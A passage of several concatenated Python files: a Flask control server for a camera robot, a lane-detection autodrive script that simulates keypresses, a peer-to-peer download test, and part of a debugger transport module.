config_Global_File.servo_01_Pan_Degrees = servoDegreesInt
autoPHat_SparkFun_Driver_File.servo_Cam_01_Pan_Fn( config_Global_File.servo_01_Pan_Degrees )
print("*** DEBUG: /servo_Cam_01_Pan_Degrees_FrontEnd_Fn: " + str(servoDegreesInt))
return 'ok'
@app_Cl_Ob.route('/servo_Cam_02_Tilt_Degrees_FrontEnd_Fn')
def servo_Cam_02_Tilt_Degrees_FrontEnd_Fn():
servoDegreesInt = int(request.args.get('servo_Cam_02_Tilt_Degrees_FrontEnd_Id'))
if servoDegreesInt < 0:
servoDegreesInt = 0
elif servoDegreesInt > 180:
servoDegreesInt = 180
config_Global_File.servo_02_Tilt_Degrees = servoDegreesInt
autoPHat_SparkFun_Driver_File.servo_Cam_02_Tilt_Fn( config_Global_File.servo_02_Tilt_Degrees )
print("*** DEBUG: /servo_Cam_02_Tilt_Degrees_FrontEnd_Fn: " + str(servoDegreesInt))
return 'ok'
@app_Cl_Ob.route('/servo_Arm_03_Degrees_FrontEnd_Fn')
def servo_Arm_03_Degrees_FrontEnd_Fn():
servoDegreesInt = int(request.args.get('servo_Arm_03_Degrees_FrontEnd_Id'))
if servoDegreesInt < 0:
servoDegreesInt = 0
elif servoDegreesInt > 180:
servoDegreesInt = 180
config_Global_File.servo_03_Degrees = servoDegreesInt
autoPHat_SparkFun_Driver_File.servo_Arm_03_Fn( config_Global_File.servo_03_Degrees )
print("*** DEBUG: /servo_Arm_03_Degrees_FrontEnd_Fn: " + str(servoDegreesInt))
return 'ok'
# URL for motor control - format: /motor?l=[speed]&r=[speed]
@app_Cl_Ob.route('/motorTrim')
def motorTrim():
left = request.args.get('l')
right = request.args.get('r')
print("*** *** DEBUG: motorTrim() Pre : left: " + str(left) + " right: " + str(right))
config_Global_File.left_motor_trim += int( left )
config_Global_File.right_motor_trim += int( right )
DB.write_LeftRight_MotorTrim_Fn(config_Global_File.left_motor_trim, config_Global_File.right_motor_trim)
print("*** *** DEBUG: motorTrim() Post: left: " + str(config_Global_File.left_motor_trim) + " right: " + str(config_Global_File.right_motor_trim))
return 'ok'
# URL for motor control - format: /motor?l=[speed]&r=[speed]
@app_Cl_Ob.route('/heartbeat_Freq_Mod_IncDec_Fn')
def heartbeat_Freq_IncDec_Fn():
incdec = request.args.get('incdec')
print("*** *** DEBUG: heartbeat_Freq_Mod_IncDec_Fn(): incdec: " + str(incdec))
if (config_Global_File.heartbeat_freq + int( incdec )) < 0:
print("*** *** DEBUG: heartbeat_Freq_Mod_IncDec_Fn(): config_Global_File.heartbeat_freq < 0: Invalid")
else:
config_Global_File.heartbeat_freq += int( incdec )
DB.write_Heartbeat_Freq_Fn(config_Global_File.heartbeat_freq)
print("*** *** *** *** DEBUG: heartbeat_Freq_Mod_IncDec_Fn(): config_Global_File.heartbeat_freq >= 0: Valid" )
return 'ok'
@app_Cl_Ob.route('/timer_Mission_Refresh_Fn')
def timer_Mission_Refresh_Fn():
##jwc o incdec = request.args.get('incdec')
config_Global_File._timer_Mission_Start_Sec = int(time.time())
config_Global_File._timer_Mission_Now_Sec = config_Global_File._timer_Mission_Start_Sec
config_Global_File._timer_Mission_Countdown_Sec = config_Global_File._timer_Mission_Duration_MAX_SEC
config_Global_File._timer_Mission_Expired_Bool = False
config_Global_File._timer_Mission_Reserves_Sec_Int = config_Global_File._timer_Mission_Reserves_SEC_MAX_INT
config_Global_File._timer_Mission_Recharge_Sec_Int = 0
config_Global_File._timer_Mission_Recharge_Timestamp_Int = 0
# Clear scores
score_Targeted_Dict.clear()
##jwc y score_Targeted_ClosenessToVideoCenter_Dict.clear()
score_Targeted_WeightedToVideoCenter_Dict.clear()
score_Targeted_WeightedToVideoCenter_TriggerClient_01_Dict.clear()
score_Targeted_WeightedToVideoCenter_TriggerClient_02_Dict.clear()
score_Targeted_WeightedToVideoCenter_TriggerClient_03_Dict.clear()
print("*** *** DEBUG: timer_Mission_Refresh_Fn: ", config_Global_File._timer_Mission_Start_Sec, config_Global_File._timer_Mission_Now_Sec, config_Global_File._timer_Mission_Countdown_Sec, config_Global_File._timer_Mission_Reserves_Sec_Int)
return 'ok'
@app_Cl_Ob.route('/trigger_Client_01_Fn')
def trigger_Client_01_Fn():
##jwc o incdec = request.args.get('incdec')
config_Global_File._trigger_Client_Req_01_Bool = True
print("*** *** DEBUG: trigger_Client_01_Fn: ", config_Global_File._trigger_Client_Req_01_Bool)
return 'ok'
@app_Cl_Ob.route('/trigger_Client_02_Fn')
def trigger_Client_02_Fn():
##jwc o incdec = request.args.get('incdec')
config_Global_File._trigger_Client_Req_02_Bool = True
print("*** *** DEBUG: trigger_Client_02_Fn: ", config_Global_File._trigger_Client_Req_02_Bool)
return 'ok'
@app_Cl_Ob.route('/trigger_Client_03_Fn')
def trigger_Client_03_Fn():
##jwc o incdec = request.args.get('incdec')
config_Global_File._trigger_Client_Req_03_Bool = True
print("*** *** DEBUG: trigger_Client_03_Fn: ", config_Global_File._trigger_Client_Req_03_Bool)
return 'ok'
""" jwc o
# URL for joystick input - format: /joystick?x=[x-axis]&y=[y-axis]
@app_Cl_Ob.route('/joystick')
def joystick():
config_Global_File._watchdog_Cycles_SinceLastConnect_Now = 0
x_axis = int(request.args.get('x'))
y_axis = int(request.args.get('y'))
x_axis = -1 * max( min(x_axis, 100), -100)
y_axis = max( min(y_axis, 100), -100)
v = (100-abs(x_axis)) * (y_axis/100) + y_axis
w = (100-abs(y_axis)) * (x_axis/100) + x_axis
r = int((v+w) / 2)
l = int((v-w) / 2)
if not config_Global_File.chocks:
config_Global_File.right_motor = r
config_Global_File.left_motor = l
io_Driver_File.motor_one_speed(config_Global_File.right_motor)
io_Driver_File.motor_two_speed(config_Global_File.left_motor)
return 'ok'
"""
# URL to remote control touchpads 1-4 on explorer-hat
@app_Cl_Ob.route('/touchpad')
def touchpad():
pad = request.args.get('pad')
if pad:
touch_handler(int(pad), True)
return 'ok'
# URL for heartbeat requests (resets watchdog timer)
# Returns JSON object with status data
@app_Cl_Ob.route('/heartbeat')
def heartbeat():
config_Global_File._watchdog_Cycles_SinceLastConnect_Now = 0
output = {}
output['b'] = config_Global_File.blue
output['y'] = config_Global_File.yellow
output['c'] = config_Global_File.chocks
output['g'] = config_Global_File.green
output['f'] = config_Global_File.video_fps
output['v'] = config_Global_File.video_status
output['l'] = config_Global_File.left_motor
##jwc o output['l'] = motor_1.throttle
output['r'] = config_Global_File.right_motor
##jwc o output['r'] = motor_2.throttle
# jwc
#
output['lt'] = config_Global_File.left_motor_trim
output['rt'] = config_Global_File.right_motor_trim
output['hf'] = config_Global_File.heartbeat_freq
output['s1'] = config_Global_File.servo_01_Pan_Degrees
output['s2'] = config_Global_File.servo_02_Tilt_Degrees
output['s3'] = config_Global_File.servo_03_Degrees
output['s4'] = config_Global_File.servo_04_Degrees
output['i1'] = io_Driver_File.input_one_read()
output['i2'] = io_Driver_File.input_two_read()
output['i3'] = io_Driver_File.input_three_read()
output['i4'] = io_Driver_File.input_four_read()
##jwc o output['a1'] = io_Driver_File.analog_one_read()
##jwc o output['a2'] = io_Driver_File.analog_two_read()
##jwc o output['a3'] = io_Driver_File.analog_three_read()
##jwc o output['a4'] = io_Driver_File.analog_four_read()
output['sc'] = str( score_Targeted_Dict )
##jwc y output['sctc'] = str( score_Targeted_ClosenessToVideoCenter_Dict )
output['sctw'] = str( score_Targeted_WeightedToVideoCenter_Dict )
output['sctwtc1'] = str( score_Targeted_WeightedToVideoCenter_TriggerClient_01_Dict )
output['sctwtc2'] = str( score_Targeted_WeightedToVideoCenter_TriggerClient_02_Dict )
output['sctwtc3'] = str( score_Targeted_WeightedToVideoCenter_TriggerClient_03_Dict )
## jwc replace w/ PiUpTimeUps: batteryUps_Read_Fn( config_Global_File )
##jwc n get_VoltageAndTemp_Status_Fn( config_Global_File )
piUpTimeUps_2pt0__AlchemyPower.get_VoltageAndTemp_Status_Fn( config_Global_File )
output['bvi'] = f'{config_Global_File._batteryUps_Input_V:.2f}'
output['bvo'] = f'{config_Global_File._batteryUps_Output_V:.2f}'
output['bvb'] = f'{config_Global_File._batteryUps_Battery_V:.2f}'
output['btc'] = f'{config_Global_File._batteryUps_Temp_C:5.2f}C'
output['btf'] = f'{config_Global_File._batteryUps_Temp_F:5.2f}F'
config_Global_File._timer_Mission_Now_Sec = int(time.time())
##jwc y config_Global_File._timer_Mission_Countdown_Sec = config_Global_File._timer_Mission_Duration_MAX_SEC - (config_Global_File._timer_Mission_Now_Sec - config_Global_File._timer_Mission_Start_Sec)
config_Global_File._timer_Mission_Countdown_Sec = calculate__timer_Mission_Countdown_Sec__Fn( config_Global_File._timer_Mission_Duration_MAX_SEC, config_Global_File._timer_Mission_Start_Sec, config_Global_File._timer_Mission_Now_Sec)
if(config_Global_File._timer_Mission_Countdown_Sec < 0):
config_Global_File._timer_Mission_Countdown_Sec = 0
config_Global_File._timer_Mission_Expired_Bool = True
output['tmc'] = config_Global_File._timer_Mission_Countdown_Sec
output['tme'] = config_Global_File._timer_Mission_Expired_Bool
output['tmr'] = config_Global_File._timer_Mission_Reserves_Sec_Int
output['tmres'] = config_Global_File._timer_Mission_Recharge_Sec_Int
output['tmreth'] = config_Global_File._timer_Mission_Recharge_THRESHOLD_DEC
output['tmn'] = config_Global_File._timer_Mission_Now_Sec
output['tmreti'] = config_Global_File._timer_Mission_Recharge_Timestamp_Int
##jwc n if(config_Global_File._timer_Mission_Recharge_Sec_Int > 0):
##jwc n # Reset only upon the above condition
##jwc n config_Global_File._timer_Mission_Recharge_Sec_Int = 0
print("*** *** *** DEBUG: timer_Mission: ", config_Global_File._timer_Mission_Now_Sec, config_Global_File._timer_Mission_Start_Sec, config_Global_File._timer_Mission_Countdown_Sec)
return json.dumps(output)
if __name__ == '__main__':
print("*** DEBUG: __main__")
# jwc 2020-1223 StreamVideoToWebBrowser-AdrianRosebrock
#
# construct the argument parser and parse command line arguments
argumentParser_Cl_Ob = argparse.ArgumentParser()
##jwc y argumentParser_Cl_Ob.add_argument("-i", "--ip", type=str, required=True,help="ip address of the device")
argumentParser_Cl_Ob.add_argument("-a", "--address", type=str, default='0.0.0.0', help="ip address of the device")
##jwc y argumentParser_Cl_Ob.add_argument("-o", "--port", type=int, required=True, help="ephemeral port number of the server (1024 to 65535)")
argumentParser_Cl_Ob.add_argument("-p", "--port", type=int, default=5000, help="ephemeral port number of the server (1024 to 65535)")
argumentParser_Cl_Ob.add_argument("-f", "--frame-count", type=int, default=32, help="# of frames used to construct the background model")
# jwc 2.1
##jwc o argumentParser_Cl_Ob.add_argument("-thread_Cl_Ob", "--type", type=str, default="DICT_ARUCO_ORIGINAL", help="type of ArUCo tag to detect")
##jwc type error '-thread_Cl_Ob': argumentParser_Cl_Ob.add_argument("-thread_Cl_Ob", "--type", type=str, default="DICT_6X6_100", help="type of ArUCo tag to detect")
argumentParser_Cl_Ob.add_argument("-t", "--type", type=str, default="DICT_6X6_100", help="type of ArUCo tag to detect")
print("*** DEBUG: __main__: --type (default): cv2.aruco.DICT_6X6_100")
args = vars(argumentParser_Cl_Ob.parse_args())
# verify that the supplied ArUCo tag exists and is supported by
# OpenCV
if ARUCO_DICT.get(args["type"], None) is None:
print("[INFO] ArUCo tag of '{}' is not supported".format(
args["type"]))
sys.exit(0)
# load the ArUCo dictionary and grab the ArUCo parameters
print("[INFO] detecting '{}' tags...".format(args["type"]))
arucoDict = cv2.aruco.Dictionary_get(ARUCO_DICT[args["type"]])
arucoParams = cv2.aruco.DetectorParameters_create()
io_Driver_File.light_green_blink(0.1)
time.sleep(1)
io_Driver_File.light_green_off()
# register signal handler for a clean exit
signal.signal(signal.SIGINT, signal_handler)
##jwc o # register handler for touchpads
##jwc o if io_Driver_File.explorerhat:
##jwc o io_Driver_File.xhat.touch.released(touch_handler)
# prepare and start watchdog
# jwc since watchdog happens so much (seems infinite loop and recursive) and interferes w/ debug, thus turn off
#
watchDog = threading.Thread(name='watchdog_timer', target=watchdog_timer)
watchDog.start()
# jwc 2020-1223 StreamVideoToWebBrowser-AdrianRosebrock
#
# start a thread that will perform motion detection
##jwc o AiCam 2.0 thread_Cl_Ob = threading.Thread(target=detect_Motions_ARCHIVED_Fn, args=(args["frame_count"],))
##jwc AiCam 2.1
##
thread_Cl_Ob = threading.Thread(target=detect_Motions_And_ArucoMarkers_Fn, args=(args["frame_count"],))
thread_Cl_Ob.daemon = True
thread_Cl_Ob.start()
##jwc o app_Cl_Ob.run(host='0.0.0.0', debug=False, threaded=True)
##
##jwc n app_Cl_Ob.run(host='192.168.1.80', debug=False, threaded=True)
##jwc to not conflict with other apps
##jwc y app_Cl_Ob.run(host='0.0.0.0', port=5001, debug=False, threaded=True)
## jwc NameError: name 'WSGIServer' is not defined
##jwc on http_server = WSGIServer(('', 5001), app_Cl_Ob)
##jwc on http_server.serve_forever()
##jwc y app_Cl_Ob.run(host='0.0.0.0', port=5001, debug=False, threaded=True)
##jwc n seems to cause rpi crash and video-stream not work: app_Cl_Ob.run(host='0.0.0.0', port=5001, debug=True, threaded=True)
##jwc y app_Cl_Ob.run(host='0.0.0.0', port=5001, debug=True, threaded=False)
##jwc y app_Cl_Ob.run(host='0.0.0.0', port=5001, debug=True, threaded=True)
# jwc: Does 'debug=False' prevents two instances of 'main()'
# jwc: TYJ camera seems to work now, via 'run: start debugging', esp. after rpi reboot
##jwc yo app_Cl_Ob.run(host='0.0.0.0', threaded=True)
## y app_Cl_Ob.run(host='0.0.0.0', debug=True, threaded=True)
##jwc y app_Cl_Ob.run(host='0.0.0.0', threaded=True)
##jwc y app_Cl_Ob.run(host='0.0.0.0', port=5000, debug=False, threaded=True)
##jwc n app_Cl_Ob.run(host='0.0.0.0', port=80, debug=False, threaded=True)
##jwc app_Cl_Ob.run(host='0.0.0.0', port=8888, debug=False, threaded=True)
##jwc o app_Cl_Ob.run(host='0.0.0.0', port=5000, debug=False, threaded=True)
# jwc 2020-1223 StreamVideoToWebBrowser-AdrianRosebrock
#
#jwc y app_Cl_Ob.run(host=args["address"], port=args["port"], debug=True, threaded=True, use_reloader=False)
# jwc TYJ following works with local debugging, though cam may not work
# jwc o, obsolete since now will use external-VSCode-debugger and not Flask-debugger: app_Cl_Ob.run(host=args["address"], port=args["port"], debug=False, threaded=True, use_reloader=False)
## jwc Seems that Flask-dedug now fix and not this 'passthrough_errosrs' workaround: 'passthrough_errors=True' since need errors to bubble up to ext VSCode-debugger
##jwc y app_Cl_Ob.run(host=args["address"], port=args["port"], use_debugger=False, threaded=True, use_reloader=False, passthrough_errors=True)
##jwc y app_Cl_Ob.run(host=args["address"], port=args["port"], use_debugger=False, threaded=True, use_reloader=False, passthrough_errors=False)
##jwc y 2021-0113 app_Cl_Ob.run(host=args["address"], port=args["port"], use_debugger=False, threaded=True, use_reloader=False, passthrough_errors=True)
# * For Flask In-House Development Non-Production Server
##jwc yy app_Cl_Ob.run(host=args["address"], port=args["port"], debug=True, threaded=True, use_reloader=False, passthrough_errors=True)
# * For WSGI Server: GUnicorn
##jwc n app_Cl_Ob.run()
##jwc y app_Cl_Ob.run()
# * For WSGI Server: Waitress
##jwc yn queue issue: serve( app_Cl_Ob, host='0.0.0.0', port=5000, url_scheme='https' )
# * Threads default = 4, issue w/ 2,3rd browser
##jwc n not any better, seems worst: serve( app_Cl_Ob, host='0.0.0.0', port=5000, url_scheme='https', threads=6 )
## from 6 to 100
serve( app_Cl_Ob, host='0.0.0.0', port=5000, url_scheme='https', threads=100 )
# * Gevent
##jwc y? http_server = WSGIServer(('', 5000), app_Cl_Ob)
##jwc y? http_server.serve_forever()
# jwc 2020-1223 StreamVideoToWebBrowser-AdrianRosebrock
#
# release the video stream pointer
videoStream_Cl_Ob.stop()
|
autodrive.py
|
import argparse
import importlib
import json
import math
import os
import pprint
import sys
import threading
from copy import deepcopy
from time import sleep, time
import cv2
import matplotlib.pyplot as plt
import numpy as np
import torch
import torch.nn.functional as F
import win32gui
from PIL import Image, ImageGrab
from pynput import keyboard
from pynput.mouse import Button, Controller, Listener
from torch import nn
from config import system_configs
from keys import Keys
from nnet.py_factory import NetworkFactory
from utils import normalize_
from simple_pid import PID
torch.backends.cudnn.benchmark = False
SPEED = 10
GREEN = [0, 255, 0]
WHITE = [255, 255, 255]
RED = [0, 0, 255]
ORANGE = [0, 127, 255]
ctr = Keys()
SHUTDOWN = False
AUTOMODE = False
# XX, YY, ZZ = 0.0005, 0, 0
XX, YY, ZZ = 0, 0, 0
XX, YY, ZZ = 1e-6, 1e-7, 3e-6
KP, KI, KD = 0.000001, 0.0000001, 0.0000001
NEW_PID = True
def stop():
global SPEED
ctr.directKey('s')
sleep(0.01*SPEED+0.3)
ctr.directKey('s', ctr.key_release)
def steer(dx):
global ctr, SPEED
# dx = dx*SPEED
# ctr.directMouse(ctr.mouse_lb_release)
# ctr.directMouse(ctr.mouse_lb_press)
# dx = np.floor(dx).astype(np.int32)
print(np.abs(dx))
# sleep(0.1)
# ctr.directMouse(-dx, 0)
if -dx<0:
ctr.directKey('a')
sleep(np.abs(dx))
ctr.directKey('a', ctr.key_release)
if -dx>0:
ctr.directKey('d')
sleep(np.abs(dx))
ctr.directKey('d', ctr.key_release)
def delay_process(msg, param=()):
func = None
if msg=='stop':
func = stop
if msg=='steer':
func = steer
if func!=None:
t = threading.Thread(target=func, args=param)
t.start()
def PostProcess(outputs, target_sizes):
out_logits, out_curves = outputs['pred_logits'], outputs['pred_curves']
assert len(out_logits) == len(target_sizes)
assert target_sizes.shape[1] == 2
prob = F.softmax(out_logits, -1)
_, labels = prob.max(-1)
labels[labels != 1] = 0
results = torch.cat([labels.unsqueeze(-1).float(), out_curves], dim=-1)
return results
def get_lane_model():
input_size = [360, 640]
mean = np.array([0.40789654, 0.44719302, 0.47026115], dtype=np.float32)
std = np.array([0.28863828, 0.27408164, 0.27809835], dtype=np.float32)
with open('config\\LSTR.json', "r") as f:
configs = json.load(f)
configs["system"]["snapshot_name"] = 'LSTR'
system_configs.update_config(configs["system"])
nnet = NetworkFactory()
with open('cache\\nnet\\LSTR\\LSTR_500000.pkl', "rb") as f:
params = torch.load(f)
model_dict = nnet.model.state_dict()
if len(params) != len(model_dict):
pretrained_dict = {k: v for k, v in params.items() if k in model_dict}
else:
pretrained_dict = params
model_dict.update(pretrained_dict)
nnet.model.load_state_dict(model_dict)
nnet.cuda()
nnet.eval_mode()
return nnet, input_size, mean, std
def lane_detection(ori_image, mean, std, input_size, nnet, point=True):
image = cv2.cvtColor(ori_image, cv2.COLOR_BGR2RGB)
height, width = image.shape[0:2]
images = np.zeros((1, 3, input_size[0], input_size[1]), dtype=np.float32)
masks = np.ones((1, 1, input_size[0], input_size[1]), dtype=np.float32)
orig_target_sizes = torch.tensor(input_size).unsqueeze(0).cuda()
pad_image = image.copy()
pad_mask = np.zeros((height, width, 1), dtype=np.float32)
resized_image = cv2.resize(pad_image, (input_size[1], input_size[0]))
resized_mask = cv2.resize(pad_mask, (input_size[1], input_size[0]))
masks[0][0] = resized_mask.squeeze()
resized_image = resized_image / 255.
normalize_(resized_image, mean, std)
resized_image = resized_image.transpose(2, 0, 1)
images[0] = resized_image
images = torch.from_numpy(images).cuda(non_blocking=True)
masks = torch.from_numpy(masks).cuda(non_blocking=True)
torch.cuda.synchronize(0) # 0 is the GPU id
outputs, _ = nnet.test([images, masks])
torch.cuda.synchronize(0) # 0 is the GPU id
results = PostProcess(outputs, orig_target_sizes)
pred = results[0].cpu().numpy()
img = pad_image
img_h, img_w, _ = img.shape
pred = pred[pred[:, 0].astype(int) == 1]
# overlay = np.zeros_like(img, np.uint8)
overlay_rgb = img.copy()
point_xy = []
for i, lane in enumerate(pred):
lane = lane[1:] # remove conf
lower, upper = lane[0], lane[1]
lane = lane[2:] # remove upper, lower positions
# generate points from the polynomial
ys = np.linspace(lower, upper, num=100)
points = np.zeros((len(ys), 2), dtype=np.int32)
points[:, 1] = (ys * img_h).astype(int)
points[:, 0] = ((lane[0] / (ys - lane[1]) ** 2 + lane[2] / (ys - lane[1]) + lane[3] + lane[4] * ys -
lane[5]) * img_w).astype(int)
points = points[(points[:, 0] > 0) & (points[:, 0] < img_w)]
point_xy.append(points)
if point:
for xxx, yyy in points:
# cv2.circle(overlay, (xxx, yyy), 1, color=WHITE, thickness=1)
cv2.circle(overlay_rgb, (xxx, yyy), 1, color=GREEN, thickness=1)
else:
for current_point, next_point in zip(points[:-1], points[1:]):
# overlay = cv2.line(overlay, tuple(current_point), tuple(next_point), color=WHITE, thickness=1)
overlay_rgb = cv2.line(overlay_rgb, tuple(current_point), tuple(next_point), color=GREEN, thickness=1)
return overlay_rgb, point_xy
def transform_point(pointxy, M):
result = []
for lanes in pointxy:
ps = lanes.shape[0]
pad = np.ones((ps,1), dtype=lanes.dtype)
pad = np.concatenate([lanes, pad], axis=1)
res = np.matmul(pad, M.T)
result.append(np.floor(res[:,:2]/res[:,-1][:, np.newaxis]).astype(np.int32))
return result
def on_press(key):
global AUTOMODE, SHUTDOWN, XX, YY, ZZ, KP, KI, KD, NEW_PID
try:
if key.vk==96+7:
XX-=KP
print("XX{} YY{} ZZ{}".format(XX, YY, ZZ))
if key.vk==96+9:
XX+=KP
print("XX{} YY{} ZZ{}".format(XX, YY, ZZ))
if key.vk==96+4:
YY-=KI
print("XX{} YY{} ZZ{}".format(XX, YY, ZZ))
if key.vk==96+6:
YY+=KI
print("XX{} YY{} ZZ{}".format(XX, YY, ZZ))
if key.vk==96+1:
ZZ-=KD
print("XX{} YY{} ZZ{}".format(XX, YY, ZZ))
if key.vk==96+3:
ZZ+=KD
print("XX{} YY{} ZZ{}".format(XX, YY, ZZ))
except AttributeError:
pass
def on_release(key):
global AUTOMODE, SHUTDOWN, XX, YY, ZZ, KP, KI, KD, NEW_PID
try:
if key.char=='=': # auto drive on-off
if AUTOMODE:
AUTOMODE = False
print('Automode end!')
ctr.directKey('w', ctr.key_release)
delay_process('stop')
else:
AUTOMODE = True
print('Automode start!')
ctr.directMouse(buttons=ctr.mouse_lb_press)
ctr.directMouse(buttons=ctr.mouse_lb_release)
ctr.directKey('w')
# if key.char=='-':
# ctr.directMouse(buttons=ctr.mouse_lb_release)
# ctr.directKey('w', ctr.key_release)
# SHUTDOWN=True
# return False
if key.vk==96+5:
NEW_PID=True
except AttributeError:
pass
def main():
global SHUTDOWN, AUTOMODE, NEW_PID, XX, YY, ZZ
nnet, input_size, mean, std = get_lane_model()
bbox = (40,119,840,719)
keyboard_listener = keyboard.Listener(
on_release=on_release,
on_press=on_press
)
keyboard_listener.start()
while(True):
if NEW_PID:
pid=PID(XX, YY, ZZ, 400)
pid.output_limits = (-1, 1)
NEW_PID=False
print('set new PID({},{},{})'.format(XX, YY, ZZ))
last_time = time()
image = np.array(ImageGrab.grab(bbox=bbox))
mix, points_xy = lane_detection(image, mean, std, input_size, nnet, True)
# original pts
pts_o = np.float32([[0, 200], [0, 600], [800, 600], [800, 200]])
pts_d = np.float32([[0, 0], [346, 400], [454, 400], [800, 0]])
M = cv2.getPerspectiveTransform(pts_o, pts_d)
black_bg = np.zeros((400, 800, 3), dtype=np.float32)
new_points = transform_point(points_xy, M)
ploynomial = []
left_lane = (1000,None)
right_lane = (1000,None)
for lanes in new_points:
lanes = lanes[(lanes[:,0]>=0)&(lanes[:,1]>=0)]
if lanes.shape[0]==0:
continue
ploynomial.append(np.polyfit(lanes[:,1]/400, lanes[:,0]/800, deg=3))
a,b,c,d = ploynomial[-1]
abcd = a+b+c+d
if abcd<0.5 and (0.5-abcd)<left_lane[0]:
left_lane = (0.5-abcd, ploynomial[-1])
if 0.5<abcd and (abcd-0.5)<right_lane[0]:
right_lane = (abcd-0.5, ploynomial[-1])
ratio = 1
if left_lane[0]!=1000 and right_lane[0]!=1000:
aa, bb, cc, dd = (left_lane[1]+right_lane[1])/2
if AUTOMODE:
# steer_dx = pid((aa*ratio**3+bb*ratio**2+cc*ratio+dd)*800)
steer_dx = pid((aa*ratio**3+bb*ratio**2+cc*ratio+dd)*800)
delay_process('steer', (steer_dx,))
for xx in range(400):
x = xx/400
a,b,c,d = left_lane[1]
y1 = np.floor((a*x**3+b*x**2+c*x+d)*800).astype(np.int32)
cv2.circle(black_bg, (y1, xx), 1, color=GREEN, thickness=1)
a,b,c,d = right_lane[1]
y2 = np.floor((a*x**3+b*x**2+c*x+d)*800).astype(np.int32)
cv2.circle(black_bg, (y2, xx), 1, color=GREEN, thickness=1)
y = np.floor((aa*x**3+bb*x**2+cc*x+dd)*800).astype(np.int32)
cv2.circle(black_bg, (np.floor(y).astype(np.int32), xx), 1, color=RED, thickness=1)
cv2.line(black_bg, (383,np.floor(400*ratio-10).astype(np.int32)), (383,np.floor(400*ratio).astype(np.int32)), color=ORANGE, thickness=2)
cv2.line(black_bg, (400,np.floor(400*ratio-10).astype(np.int32)), (400,np.floor(400*ratio).astype(np.int32)), color=ORANGE, thickness=2)
cv2.line(black_bg, (417,np.floor(400*ratio-10).astype(np.int32)), (417,np.floor(400*ratio).astype(np.int32)), color=ORANGE, thickness=2)
cv2.imshow('proce', black_bg)
black_bg = black_bg[:,200:-200,:]
black_bg = cv2.resize(black_bg, (90, 90))
# mix = cv2.cvtColor(mix, cv2.COLOR_BGR2BGRA)
# process = cv2.cvtColor(process, cv2.COLOR_BGR2BGRA)
w = 0.6
mix[-130:-40,-130:-40,:] = w*mix[-130:-40,-130:-40,:] + (1-w)*black_bg
# mix[40:130,-130:-40,:] = np.clip(mix[40:130,-130:-40,:] + process, None, 255)
# cv2.imshow('win', lane)
cv2.putText(mix, 'FPS:{:.2f}'.format(1/(time()-last_time)), (718, 29), cv2.FONT_HERSHEY_SIMPLEX, 0.5, WHITE)
cv2.imshow('ori', mix)
if cv2.waitKey(25) & 0xFF == ord('q'):
cv2.destroyAllWindows()
break
if SHUTDOWN:
cv2.destroyAllWindows()
break
if __name__ == "__main__":
main()
print('Normal exit.')
|
ComplexTest.py
|
import time
from threading import Thread
from PClient import PClient
tracker_address = ("127.0.0.1", 10086)
if __name__ == '__main__':
# A,B,C,D,E join the network
A = PClient(tracker_address, upload_rate=200000, download_rate=50000, name='A')
B = PClient(tracker_address, upload_rate=50000, download_rate=100000, name='B')
C = PClient(tracker_address, upload_rate=100000, download_rate=50000, name='C')
D = PClient(tracker_address, upload_rate=70000, download_rate=40000, name='D')
E = PClient(tracker_address, upload_rate=200000, download_rate=700000, name='E')
clients = [B, C, D, E]
# A register a file and B download it
fid = A.register("../test_files/bg.png")
threads = []
files = {}
# function for download and save
def download(node, index):
files[index] = node.download(fid)
time_start = time.time_ns()
for i, client in enumerate(clients):
threads.append(Thread(target=download, args=(client, i)))
# start download in parallel
for t in threads:
t.start()
# wait for finish
for t in threads:
t.join()
# check the downloaded files
with open("../test_files/bg.png", "rb") as bg:
bs = bg.read()
for i in files:
if files[i] != bs:
raise Exception("Downloaded file is different with the original one")
# B, C, D, E has completed the download of file
threads.clear()
F = PClient(tracker_address, upload_rate=50000, download_rate=100000, name='F')
G = PClient(tracker_address, upload_rate=100000, download_rate=60000, name='G')
# F, G join the network
clients = [F, G]
for i, client in enumerate(clients):
threads.append(Thread(target=download, args=(client, i)))
for t in threads:
t.start()
# A exits
time.sleep(20)
A.cancel(fid)
# B exits
time.sleep(10)
B.close()
# D exits
time.sleep(30)
D.close()
for t in threads:
t.join()
for i in files:
if files[i] != bs:
raise Exception("Downloaded file is different with the original one")
print("SUCCESS")
A.close()
C.close()
E.close()
F.close()
G.close()
print((time.time_ns() - time_start) * 1e-9)
|
transports.py
|
from __future__ import annotations
from ...typecheck import *
from ...import core
from ...dap import Transport
import socket
import os
import subprocess
import threading
class Process:
@staticmethod
async def check_output(command: list[str], cwd: str|None = None) -> bytes:
return await core.run_in_executor(lambda: subprocess.check_output(command, cwd=cwd))
def __init__(self, command: list[str], cwd: str|None = None):
# taken from Default/exec.py
# Hide the console window on Windows
startupinfo = None
if os.name == "nt":
startupinfo = subprocess.STARTUPINFO() #type: ignore
startupinfo.dwFlags |= subprocess.STARTF_USESHOWWINDOW #type: ignore
self.process = subprocess.Popen(command,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
shell=False,
bufsize=0,
startupinfo=startupinfo,
cwd = cwd)
self.stdin = self.process.stdin
self.stderr = self.process.stderr
self.stdout = self.process.stdout
self.closed = False
def _readline(self, pipe) -> bytes:
if l := pipe.readline():
return l
raise EOFError
def _read(self, pipe, n: int) -> bytes:
if l := pipe.read(n):
return l
raise EOFError
async def readline(self, pipe) -> bytes:
return await core.run_in_executor(lambda: self._readline(pipe))
async def read(self, pipe, nbytes) -> bytes:
return await core.run_in_executor(lambda: self._read(pipe, nbytes))
def dispose(self):
self.closed = True
try:
self.process.terminate()
except Exception as e:
core.log_exception()
class StdioTransport(Transport):
def __init__(self, log: core.Logger, command: List[str], cwd: Optional[str] = None):
log.log('transport', f'⟸ process/starting :: {command}')
self.process = Process(command, cwd)
thread = threading.Thread(target=self._read, args=(self.process.stderr, log.info))
thread.start()
def _read(self, file: Any, callback: Callable[[str], None]) -> None:
while True:
try:
line = file.read(2**15).decode('UTF-8')
if not line:
core.log_info('Nothing to read from process, closing')
break
core.call_soon_threadsafe(callback, line)
except Exception as e:
core.log_exception()
break
self.process.dispose()
def write(self, message: bytes) -> None:
self.process.stdin.write(message)
self.process.stdin.flush()
def readline(self) -> bytes:
if l := self.process.stdout.readline():
return l
raise EOFError
def read(self, n: int) -> bytes:
if l := self.process.stdout.read(n):
return l
raise EOFError
def dispose(self) -> None:
self.process.dispose()
class SocketTransport(Transport):
def __init__(self, log: core.Logger, host: str, port: int, cwd: str|None = None):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
